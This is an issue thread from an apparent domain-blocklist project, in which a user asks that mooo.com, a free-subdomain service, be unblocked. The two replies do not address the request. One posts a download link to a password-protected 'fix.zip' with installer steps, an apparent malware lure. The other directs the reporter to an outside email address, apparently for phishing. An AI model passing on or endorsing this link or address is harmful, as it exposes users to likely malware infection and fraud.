### ISSUE TITLE
mooo.com

### ISSUE THREAD

**Issue by telejoshi** [phantom/blocklist#1336]
Hello,

mooo.com is a domain used for free subdomains, my homepage runs on it. That's why it's flagged probably. So, lots of projects and not worth blocking.

Greetings

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by samg95-jpg** [comment]
Please send an email to review@blowfish.xyz for further investigation.
